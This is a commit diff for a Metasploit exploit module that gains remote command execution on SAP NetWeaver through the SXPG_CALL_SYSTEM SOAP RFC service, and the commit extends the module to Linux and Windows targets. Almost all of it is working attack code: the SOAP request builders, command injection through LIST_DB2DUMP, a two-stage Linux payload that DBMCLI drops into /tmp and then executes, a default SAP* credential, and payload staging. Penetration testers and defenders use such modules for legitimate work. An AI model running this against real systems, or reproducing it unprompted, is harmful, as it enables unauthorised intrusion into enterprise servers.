Clean up sap_soap_rfc_sxpg_call_system_exec and make it multi platform
parent
76f6d9f130
commit
24bad9c15c
|
@ -25,29 +25,58 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution',
|
||||
'Name' => 'SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module makes use of the SXPG_CALL_SYSTEM Remote Function Call, through the
|
||||
use of the /sap/bc/soap/rfc SOAP service to execute OS commands as configured in
|
||||
the SM69 transaction.
|
||||
},
|
||||
This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP
|
||||
RFC Service, to execute remote commands. This module needs SAP credentials with
|
||||
privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
|
||||
successfully on Windows 2008 64 bits and Linux 64 bits platforms.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]
|
||||
],
|
||||
'DisclosureDate' => 'March 26 2013',
|
||||
'Platform' => ['windows'],
|
||||
'Targets' => [['Windows Universal',{'Arch' => ARCH_X64,'Platform' => 'win'}]],
|
||||
'DisclosureDate' => 'Mar 26 2013',
|
||||
'Platform' => ['win', 'unix'],
|
||||
'Targets' => [
|
||||
[ 'Linux',
|
||||
{
|
||||
'Arch' => ARCH_CMD,
|
||||
'Platform' => 'unix'
|
||||
#'Payload' =>
|
||||
#{
|
||||
#'DisableNops' => true,
|
||||
#'Space' => 232,
|
||||
#'Compat' =>
|
||||
#{
|
||||
#'PayloadType' => 'cmd',
|
||||
#'RequiredCmd' => 'perl ruby',
|
||||
#}
|
||||
#}
|
||||
}
|
||||
],
|
||||
[ 'Windows x64',
|
||||
{
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Platform' => 'win'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => true,
|
||||
'Author' =>['nmonkee'],
|
||||
'Privileged' => false,
|
||||
'Author' =>
|
||||
[
|
||||
'nmonkee'
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
register_options(
|
||||
|
@ -55,72 +84,117 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
Opt::RPORT(8000),
|
||||
OptString.new('CLIENT', [true, 'SAP Client', '001']),
|
||||
OptString.new('USERNAME', [true, 'Username', 'SAP*']),
|
||||
OptString.new('PASSWORD', [true, 'Password', '06071992']),
|
||||
OptString.new('CMD', [true, 'SM69 command to be executed', nil]),
|
||||
OptEnum.new('OS', [true, 'SM69 Target OS','ANYOS',['ANYOS','Windows NT']])
|
||||
OptString.new('PASSWORD', [true, 'Password', '06071992'])
|
||||
], self.class)
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 250]),
|
||||
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def send_soap_request(data)
|
||||
res = send_request_cgi({
|
||||
'uri' => '/sap/bc/soap/rfc',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
|
||||
'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'ctype' => 'text/xml; charset=UTF-8',
|
||||
'headers' => {
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
},
|
||||
'vars_get' => {
|
||||
'sap-client' => datastore['CLIENT'],
|
||||
'sap-language' => 'EN'
|
||||
}
|
||||
})
|
||||
return res
|
||||
end
|
||||
|
||||
def build_soap_request(command, sap_command, sap_os)
|
||||
data = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>"
|
||||
data << "<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">"
|
||||
data << "<env:Body>"
|
||||
data << "<n1:SXPG_CALL_SYSTEM xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
|
||||
data << "<ADDITIONAL_PARAMETERS>#{command}</ADDITIONAL_PARAMETERS>"
|
||||
data << "<COMMANDNAME>#{sap_command}</COMMANDNAME>"
|
||||
data << "<OPERATINGSYSTEM>#{sap_os}</OPERATINGSYSTEM>"
|
||||
data << "<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>"
|
||||
data << "</n1:SXPG_CALL_SYSTEM>"
|
||||
data << "</env:Body>"
|
||||
data << "</env:Envelope>"
|
||||
return data
|
||||
end
|
||||
|
||||
def check
|
||||
data = rand_text_alphanumeric(4 + rand(4))
|
||||
res = send_soap_request(data)
|
||||
if res and res.code == 500 and res.body =~ /faultstring/
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
linemax = datastore['PAYLOAD_SPLIT']
|
||||
print_status("Using custom payload size of #{linemax}") if linemax != 250
|
||||
print_status("[SAP] #{rhost}:#{rport} - sending SOAP SXPG_COMMAND_EXECUTE request")
|
||||
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
|
||||
handler(nil)
|
||||
if target.name =~ /Windows/
|
||||
linemax = datastore['PAYLOAD_SPLIT']
|
||||
vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
|
||||
print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
|
||||
execute_cmdstager({ :delay => 0.35, :linemax => linemax })
|
||||
elsif target.name =~ /Linux/
|
||||
file = rand_text_alphanumeric(5)
|
||||
stage_one = create_unix_payload(1,file)
|
||||
print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
|
||||
res = send_soap_request(stage_one)
|
||||
if res and res.code == 200 and res.body =~ /External program terminated/
|
||||
print_good("#{rhost}:#{rport} - Payload dump was successful")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
|
||||
end
|
||||
stage_two = create_unix_payload(2,file)
|
||||
print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
|
||||
send_soap_request(stage_two)
|
||||
end
|
||||
end
|
||||
|
||||
def create_unix_payload(stage, file)
|
||||
command = ""
|
||||
if target.name =~ /Linux/
|
||||
if stage == 1
|
||||
my_payload = payload.encoded.gsub(" ","\t")
|
||||
my_payload.gsub!("&","&")
|
||||
my_payload.gsub!("<","<")
|
||||
command = "-o /tmp/" + file + " -n pwnie" + "\n!"
|
||||
command << my_payload
|
||||
command << "\n"
|
||||
elsif stage == 2
|
||||
command = "-ic /tmp/" + file
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
command = cmd.gsub(/&/,'&')
|
||||
os = datastore['OS']
|
||||
data = '<?xml version="1.0" encoding="utf-8" ?>'
|
||||
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
|
||||
data << '<env:Body>'
|
||||
data << '<n1:SXPG_CALL_SYSTEM xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
|
||||
data << '<ADDITIONAL_PARAMETERS>&' + command.to_s + '</ADDITIONAL_PARAMETERS>'
|
||||
data << '<COMMANDNAME>' + datastore['CMD'] + '</COMMANDNAME>'
|
||||
data << '<OPERATINGSYSTEM>' + os +'</OPERATINGSYSTEM>'
|
||||
data << '<EXEC_PROTOCOL><item></item></EXEC_PROTOCOL>'
|
||||
data << '</n1:SXPG_CALL_SYSTEM>'
|
||||
data << '</env:Body>'
|
||||
data << '</env:Envelope>'
|
||||
user_pass = Rex::Text.encode_base64(datastore['USERNAME'] + ":" + datastore['PASSWORD'])
|
||||
command = cmd.gsub(/&/, "&")
|
||||
command.gsub!(/%TEMP%\\/, "")
|
||||
data = build_soap_request("&#{command}", "LIST_DB2DUMP", "ANYOS")
|
||||
begin
|
||||
res = send_request_raw({
|
||||
'uri' => '/sap/bc/soap/rfc?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>{
|
||||
'Content-Length' => data.size.to_s,
|
||||
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
|
||||
'Cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
|
||||
'Authorization' => 'Basic ' + user_pass,
|
||||
'Content-Type' => 'text/xml; charset=UTF-8'
|
||||
}
|
||||
}, 45)
|
||||
if res and res.code != 500 and res.code != 200
|
||||
# to do - implement error handlers for each status code, 404, 301, etc.
|
||||
print_error("[SAP] #{rhost}:#{rport} - something went wrong!")
|
||||
return
|
||||
elsif res and res.body =~ /faultstring/
|
||||
error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
|
||||
0.upto(error.length-1) do |i|
|
||||
print_error("[SAP] #{rhost}:#{rport} - error #{error[i]}")
|
||||
end
|
||||
return
|
||||
elsif res and res.code == 200
|
||||
res = send_soap_request(data)
|
||||
if res and res.code == 200
|
||||
return
|
||||
else
|
||||
print_error("[SAP] #{rhost}:#{rport} - Unknown error")
|
||||
return
|
||||
if res and res.body =~ /faultstring/
|
||||
error = res.body.scan(%r{<faultstring>(.*?)</faultstring>})
|
||||
0.upto(error.length-1) do |i|
|
||||
vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
|
||||
end
|
||||
end
|
||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
|
||||
return
|
||||
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue